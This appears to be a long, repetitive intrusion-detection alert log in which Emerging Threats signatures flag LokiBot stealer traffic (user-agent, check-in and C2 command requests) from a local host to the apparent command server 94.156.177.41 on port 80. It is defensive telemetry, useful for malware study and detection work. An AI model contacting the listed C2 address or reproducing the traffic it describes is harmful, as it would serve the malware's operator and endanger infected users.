                              2025-01-11T08:37:20.295163+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94982894.156.177.4180TCP
                              2025-01-11T08:37:20.295163+01002025381ET MALWARE LokiBot Checkin1192.168.2.94982894.156.177.4180TCP
                              2025-01-11T08:37:20.295163+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94982894.156.177.4180TCP
                              2025-01-11T08:37:21.015453+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94982894.156.177.4180TCP
                              2025-01-11T08:37:21.333703+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94983494.156.177.4180TCP
                              2025-01-11T08:37:21.333703+01002025381ET MALWARE LokiBot Checkin1192.168.2.94983494.156.177.4180TCP
                              2025-01-11T08:37:21.333703+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94983494.156.177.4180TCP
                              2025-01-11T08:37:22.060608+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94983494.156.177.4180TCP
                              2025-01-11T08:37:22.217012+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94984194.156.177.4180TCP
                              2025-01-11T08:37:22.217012+01002025381ET MALWARE LokiBot Checkin1192.168.2.94984194.156.177.4180TCP
                              2025-01-11T08:37:22.217012+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94984194.156.177.4180TCP
                              2025-01-11T08:37:22.934799+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94984194.156.177.4180TCP
                              2025-01-11T08:37:23.102371+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94984894.156.177.4180TCP
                              2025-01-11T08:37:23.102371+01002025381ET MALWARE LokiBot Checkin1192.168.2.94984894.156.177.4180TCP
                              2025-01-11T08:37:23.102371+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94984894.156.177.4180TCP
                              2025-01-11T08:37:23.790840+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94984894.156.177.4180TCP
                              2025-01-11T08:37:24.122123+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94985494.156.177.4180TCP
                              2025-01-11T08:37:24.122123+01002025381ET MALWARE LokiBot Checkin1192.168.2.94985494.156.177.4180TCP
                              2025-01-11T08:37:24.122123+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94985494.156.177.4180TCP
                              2025-01-11T08:37:24.850077+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94985494.156.177.4180TCP
                              2025-01-11T08:37:25.027858+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94986494.156.177.4180TCP
                              2025-01-11T08:37:25.027858+01002025381ET MALWARE LokiBot Checkin1192.168.2.94986494.156.177.4180TCP
                              2025-01-11T08:37:25.027858+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94986494.156.177.4180TCP
                              2025-01-11T08:37:25.749213+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94986494.156.177.4180TCP
                              2025-01-11T08:37:25.900548+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94987094.156.177.4180TCP
                              2025-01-11T08:37:25.900548+01002025381ET MALWARE LokiBot Checkin1192.168.2.94987094.156.177.4180TCP
                              2025-01-11T08:37:25.900548+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94987094.156.177.4180TCP
                              2025-01-11T08:37:26.588548+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94987094.156.177.4180TCP
                              2025-01-11T08:37:26.766848+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94987694.156.177.4180TCP
                              2025-01-11T08:37:26.766848+01002025381ET MALWARE LokiBot Checkin1192.168.2.94987694.156.177.4180TCP
                              2025-01-11T08:37:26.766848+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94987694.156.177.4180TCP
                              2025-01-11T08:37:27.478445+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94987694.156.177.4180TCP
                              2025-01-11T08:37:27.644318+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94988294.156.177.4180TCP
                              2025-01-11T08:37:27.644318+01002025381ET MALWARE LokiBot Checkin1192.168.2.94988294.156.177.4180TCP
                              2025-01-11T08:37:27.644318+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94988294.156.177.4180TCP
                              2025-01-11T08:37:28.381899+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94988294.156.177.4180TCP
                              2025-01-11T08:37:28.555245+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94988894.156.177.4180TCP
                              2025-01-11T08:37:28.555245+01002025381ET MALWARE LokiBot Checkin1192.168.2.94988894.156.177.4180TCP
                              2025-01-11T08:37:28.555245+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94988894.156.177.4180TCP
                              2025-01-11T08:37:29.254495+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94988894.156.177.4180TCP
                              2025-01-11T08:37:29.427877+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94989594.156.177.4180TCP
                              2025-01-11T08:37:29.427877+01002025381ET MALWARE LokiBot Checkin1192.168.2.94989594.156.177.4180TCP
                              2025-01-11T08:37:29.427877+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94989594.156.177.4180TCP
                              2025-01-11T08:37:30.159633+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94989594.156.177.4180TCP
                              2025-01-11T08:37:30.321553+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94990494.156.177.4180TCP
                              2025-01-11T08:37:30.321553+01002025381ET MALWARE LokiBot Checkin1192.168.2.94990494.156.177.4180TCP
                              2025-01-11T08:37:30.321553+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94990494.156.177.4180TCP
                              2025-01-11T08:37:31.068873+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94990494.156.177.4180TCP
                              2025-01-11T08:37:31.243472+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94991194.156.177.4180TCP
                              2025-01-11T08:37:31.243472+01002025381ET MALWARE LokiBot Checkin1192.168.2.94991194.156.177.4180TCP
                              2025-01-11T08:37:31.243472+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94991194.156.177.4180TCP
                              2025-01-11T08:37:31.960696+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94991194.156.177.4180TCP
                              2025-01-11T08:37:32.132348+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94991794.156.177.4180TCP
                              2025-01-11T08:37:32.132348+01002025381ET MALWARE LokiBot Checkin1192.168.2.94991794.156.177.4180TCP
                              2025-01-11T08:37:32.132348+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94991794.156.177.4180TCP
                              2025-01-11T08:37:32.876960+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94991794.156.177.4180TCP
                              2025-01-11T08:37:33.035370+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94992394.156.177.4180TCP
                              2025-01-11T08:37:33.035370+01002025381ET MALWARE LokiBot Checkin1192.168.2.94992394.156.177.4180TCP
                              2025-01-11T08:37:33.035370+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94992394.156.177.4180TCP
                              2025-01-11T08:37:33.740539+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94992394.156.177.4180TCP
                              2025-01-11T08:37:33.901353+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94992994.156.177.4180TCP
                              2025-01-11T08:37:33.901353+01002025381ET MALWARE LokiBot Checkin1192.168.2.94992994.156.177.4180TCP
                              2025-01-11T08:37:33.901353+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94992994.156.177.4180TCP
                              2025-01-11T08:37:34.614693+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94992994.156.177.4180TCP
                              2025-01-11T08:37:34.780300+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94993894.156.177.4180TCP
                              2025-01-11T08:37:34.780300+01002025381ET MALWARE LokiBot Checkin1192.168.2.94993894.156.177.4180TCP
                              2025-01-11T08:37:34.780300+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94993894.156.177.4180TCP
                              2025-01-11T08:37:35.493079+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94993894.156.177.4180TCP
                              2025-01-11T08:37:35.656565+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94994694.156.177.4180TCP
                              2025-01-11T08:37:35.656565+01002025381ET MALWARE LokiBot Checkin1192.168.2.94994694.156.177.4180TCP
                              2025-01-11T08:37:35.656565+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94994694.156.177.4180TCP
                              2025-01-11T08:37:36.377601+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94994694.156.177.4180TCP
                              2025-01-11T08:37:36.542434+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94995294.156.177.4180TCP
                              2025-01-11T08:37:36.542434+01002025381ET MALWARE LokiBot Checkin1192.168.2.94995294.156.177.4180TCP
                              2025-01-11T08:37:36.542434+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94995294.156.177.4180TCP
                              2025-01-11T08:37:37.256341+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94995294.156.177.4180TCP
                              2025-01-11T08:37:37.413981+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94995894.156.177.4180TCP
                              2025-01-11T08:37:37.413981+01002025381ET MALWARE LokiBot Checkin1192.168.2.94995894.156.177.4180TCP
                              2025-01-11T08:37:37.413981+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94995894.156.177.4180TCP
                              2025-01-11T08:37:38.126336+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94995894.156.177.4180TCP
                              2025-01-11T08:37:38.278632+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94996494.156.177.4180TCP
                              2025-01-11T08:37:38.278632+01002025381ET MALWARE LokiBot Checkin1192.168.2.94996494.156.177.4180TCP
                              2025-01-11T08:37:38.278632+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94996494.156.177.4180TCP
                              2025-01-11T08:37:39.132869+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94996494.156.177.4180TCP
                              2025-01-11T08:37:39.298255+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94997294.156.177.4180TCP
                              2025-01-11T08:37:39.298255+01002025381ET MALWARE LokiBot Checkin1192.168.2.94997294.156.177.4180TCP
                              2025-01-11T08:37:39.298255+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94997294.156.177.4180TCP
                              2025-01-11T08:37:39.989261+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94997294.156.177.4180TCP
                              2025-01-11T08:37:40.160259+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94998094.156.177.4180TCP
                              2025-01-11T08:37:40.160259+01002025381ET MALWARE LokiBot Checkin1192.168.2.94998094.156.177.4180TCP
                              2025-01-11T08:37:40.160259+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94998094.156.177.4180TCP
                              2025-01-11T08:37:40.867627+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94998094.156.177.4180TCP
                              2025-01-11T08:37:41.027625+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94998794.156.177.4180TCP
                              2025-01-11T08:37:41.027625+01002025381ET MALWARE LokiBot Checkin1192.168.2.94998794.156.177.4180TCP
                              2025-01-11T08:37:41.027625+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94998794.156.177.4180TCP
                              2025-01-11T08:37:41.715847+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94998794.156.177.4180TCP
                              2025-01-11T08:37:41.877046+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94999394.156.177.4180TCP
                              2025-01-11T08:37:41.877046+01002025381ET MALWARE LokiBot Checkin1192.168.2.94999394.156.177.4180TCP
                              2025-01-11T08:37:41.877046+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94999394.156.177.4180TCP
                              2025-01-11T08:37:42.601897+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94999394.156.177.4180TCP
                              2025-01-11T08:37:42.766186+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.94999994.156.177.4180TCP
                              2025-01-11T08:37:42.766186+01002025381ET MALWARE LokiBot Checkin1192.168.2.94999994.156.177.4180TCP
                              2025-01-11T08:37:42.766186+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.94999994.156.177.4180TCP
                              2025-01-11T08:37:43.489590+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.94999994.156.177.4180TCP
                              2025-01-11T08:37:43.647766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95000694.156.177.4180TCP
                              2025-01-11T08:37:43.647766+01002025381ET MALWARE LokiBot Checkin1192.168.2.95000694.156.177.4180TCP
                              2025-01-11T08:37:43.647766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95000694.156.177.4180TCP
                              2025-01-11T08:37:44.355553+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95000694.156.177.4180TCP
                              2025-01-11T08:37:44.509809+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95000994.156.177.4180TCP
                              2025-01-11T08:37:44.509809+01002025381ET MALWARE LokiBot Checkin1192.168.2.95000994.156.177.4180TCP
                              2025-01-11T08:37:44.509809+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95000994.156.177.4180TCP
                              2025-01-11T08:37:45.204506+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95000994.156.177.4180TCP
                              2025-01-11T08:37:45.351886+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001094.156.177.4180TCP
                              2025-01-11T08:37:45.351886+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001094.156.177.4180TCP
                              2025-01-11T08:37:45.351886+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001094.156.177.4180TCP
                              2025-01-11T08:37:46.087106+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001094.156.177.4180TCP
                              2025-01-11T08:37:46.247938+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001194.156.177.4180TCP
                              2025-01-11T08:37:46.247938+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001194.156.177.4180TCP
                              2025-01-11T08:37:46.247938+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001194.156.177.4180TCP
                              2025-01-11T08:37:46.977754+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001194.156.177.4180TCP
                              2025-01-11T08:37:47.141186+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001294.156.177.4180TCP
                              2025-01-11T08:37:47.141186+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001294.156.177.4180TCP
                              2025-01-11T08:37:47.141186+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001294.156.177.4180TCP
                              2025-01-11T08:37:47.837286+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001294.156.177.4180TCP
                              2025-01-11T08:37:47.993044+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001394.156.177.4180TCP
                              2025-01-11T08:37:47.993044+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001394.156.177.4180TCP
                              2025-01-11T08:37:47.993044+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001394.156.177.4180TCP
                              2025-01-11T08:37:48.699029+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001394.156.177.4180TCP
                              2025-01-11T08:37:48.851758+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001494.156.177.4180TCP
                              2025-01-11T08:37:48.851758+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001494.156.177.4180TCP
                              2025-01-11T08:37:48.851758+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001494.156.177.4180TCP
                              2025-01-11T08:37:49.557629+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001494.156.177.4180TCP
                              2025-01-11T08:37:49.710358+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001594.156.177.4180TCP
                              2025-01-11T08:37:49.710358+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001594.156.177.4180TCP
                              2025-01-11T08:37:49.710358+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001594.156.177.4180TCP
                              2025-01-11T08:37:50.432462+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001594.156.177.4180TCP
                              2025-01-11T08:37:50.589002+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001694.156.177.4180TCP
                              2025-01-11T08:37:50.589002+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001694.156.177.4180TCP
                              2025-01-11T08:37:50.589002+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001694.156.177.4180TCP
                              2025-01-11T08:37:51.359900+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001694.156.177.4180TCP
                              2025-01-11T08:37:51.533742+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001794.156.177.4180TCP
                              2025-01-11T08:37:51.533742+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001794.156.177.4180TCP
                              2025-01-11T08:37:51.533742+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001794.156.177.4180TCP
                              2025-01-11T08:37:52.255722+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001794.156.177.4180TCP
                              2025-01-11T08:37:52.420648+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001894.156.177.4180TCP
                              2025-01-11T08:37:52.420648+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001894.156.177.4180TCP
                              2025-01-11T08:37:52.420648+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001894.156.177.4180TCP
                              2025-01-11T08:37:53.124263+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001894.156.177.4180TCP
                              2025-01-11T08:37:53.281289+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95001994.156.177.4180TCP
                              2025-01-11T08:37:53.281289+01002025381ET MALWARE LokiBot Checkin1192.168.2.95001994.156.177.4180TCP
                              2025-01-11T08:37:53.281289+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95001994.156.177.4180TCP
                              2025-01-11T08:37:54.003233+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95001994.156.177.4180TCP
                              2025-01-11T08:37:54.149795+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002094.156.177.4180TCP
                              2025-01-11T08:37:54.149795+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002094.156.177.4180TCP
                              2025-01-11T08:37:54.149795+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002094.156.177.4180TCP
                              2025-01-11T08:37:54.850099+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002094.156.177.4180TCP
                              2025-01-11T08:37:55.447402+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002194.156.177.4180TCP
                              2025-01-11T08:37:55.447402+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002194.156.177.4180TCP
                              2025-01-11T08:37:55.447402+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002194.156.177.4180TCP
                              2025-01-11T08:37:56.132335+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002194.156.177.4180TCP
                              2025-01-11T08:37:56.296589+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002294.156.177.4180TCP
                              2025-01-11T08:37:56.296589+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002294.156.177.4180TCP
                              2025-01-11T08:37:56.296589+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002294.156.177.4180TCP
                              2025-01-11T08:37:57.013035+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002294.156.177.4180TCP
                              2025-01-11T08:37:57.168024+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002394.156.177.4180TCP
                              2025-01-11T08:37:57.168024+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002394.156.177.4180TCP
                              2025-01-11T08:37:57.168024+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002394.156.177.4180TCP
                              2025-01-11T08:37:57.903370+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002394.156.177.4180TCP
                              2025-01-11T08:37:58.108290+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002494.156.177.4180TCP
                              2025-01-11T08:37:58.108290+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002494.156.177.4180TCP
                              2025-01-11T08:37:58.108290+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002494.156.177.4180TCP
                              2025-01-11T08:37:58.830433+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002494.156.177.4180TCP
                              2025-01-11T08:37:58.997732+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002594.156.177.4180TCP
                              2025-01-11T08:37:58.997732+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002594.156.177.4180TCP
                              2025-01-11T08:37:58.997732+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002594.156.177.4180TCP
                              2025-01-11T08:37:59.712910+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002594.156.177.4180TCP
                              2025-01-11T08:37:59.881352+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002794.156.177.4180TCP
                              2025-01-11T08:37:59.881352+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002794.156.177.4180TCP
                              2025-01-11T08:37:59.881352+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002794.156.177.4180TCP
                              2025-01-11T08:38:00.754871+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002794.156.177.4180TCP
                              2025-01-11T08:38:00.923865+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002894.156.177.4180TCP
                              2025-01-11T08:38:00.923865+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002894.156.177.4180TCP
                              2025-01-11T08:38:00.923865+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002894.156.177.4180TCP
                              2025-01-11T08:38:01.623270+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002894.156.177.4180TCP
                              2025-01-11T08:38:01.801642+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95002994.156.177.4180TCP
                              2025-01-11T08:38:01.801642+01002025381ET MALWARE LokiBot Checkin1192.168.2.95002994.156.177.4180TCP
                              2025-01-11T08:38:01.801642+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95002994.156.177.4180TCP
                              2025-01-11T08:38:02.493986+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95002994.156.177.4180TCP
                              2025-01-11T08:38:02.929554+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003094.156.177.4180TCP
                              2025-01-11T08:38:02.929554+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003094.156.177.4180TCP
                              2025-01-11T08:38:02.929554+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003094.156.177.4180TCP
                              2025-01-11T08:38:03.624137+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003094.156.177.4180TCP
                              2025-01-11T08:38:03.788440+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003194.156.177.4180TCP
                              2025-01-11T08:38:03.788440+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003194.156.177.4180TCP
                              2025-01-11T08:38:03.788440+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003194.156.177.4180TCP
                              2025-01-11T08:38:04.490753+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003194.156.177.4180TCP
                              2025-01-11T08:38:04.654751+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003294.156.177.4180TCP
                              2025-01-11T08:38:04.654751+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003294.156.177.4180TCP
                              2025-01-11T08:38:04.654751+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003294.156.177.4180TCP
                              2025-01-11T08:38:05.395008+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003294.156.177.4180TCP
                              2025-01-11T08:38:05.736766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003394.156.177.4180TCP
                              2025-01-11T08:38:05.736766+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003394.156.177.4180TCP
                              2025-01-11T08:38:05.736766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003394.156.177.4180TCP
                              2025-01-11T08:38:06.454721+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003394.156.177.4180TCP
                              2025-01-11T08:38:06.637553+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003494.156.177.4180TCP
                              2025-01-11T08:38:06.637553+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003494.156.177.4180TCP
                              2025-01-11T08:38:06.637553+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003494.156.177.4180TCP
                              2025-01-11T08:38:07.370753+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003494.156.177.4180TCP
                              2025-01-11T08:38:07.543493+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003594.156.177.4180TCP
                              2025-01-11T08:38:07.543493+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003594.156.177.4180TCP
                              2025-01-11T08:38:07.543493+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003594.156.177.4180TCP
                              2025-01-11T08:38:08.253891+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003594.156.177.4180TCP
                              2025-01-11T08:38:08.535138+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003694.156.177.4180TCP
                              2025-01-11T08:38:08.535138+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003694.156.177.4180TCP
                              2025-01-11T08:38:08.535138+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003694.156.177.4180TCP
                              2025-01-11T08:38:09.255787+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003694.156.177.4180TCP
                              2025-01-11T08:38:09.430836+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003794.156.177.4180TCP
                              2025-01-11T08:38:09.430836+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003794.156.177.4180TCP
                              2025-01-11T08:38:09.430836+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003794.156.177.4180TCP
                              2025-01-11T08:38:10.138394+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003794.156.177.4180TCP
                              2025-01-11T08:38:10.296978+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003894.156.177.4180TCP
                              2025-01-11T08:38:10.296978+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003894.156.177.4180TCP
                              2025-01-11T08:38:10.296978+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003894.156.177.4180TCP
                              2025-01-11T08:38:11.003703+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003894.156.177.4180TCP
                              2025-01-11T08:38:11.151744+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95003994.156.177.4180TCP
                              2025-01-11T08:38:11.151744+01002025381ET MALWARE LokiBot Checkin1192.168.2.95003994.156.177.4180TCP
                              2025-01-11T08:38:11.151744+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95003994.156.177.4180TCP
                              2025-01-11T08:38:11.883164+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95003994.156.177.4180TCP
                              2025-01-11T08:38:12.040089+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004094.156.177.4180TCP
                              2025-01-11T08:38:12.040089+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004094.156.177.4180TCP
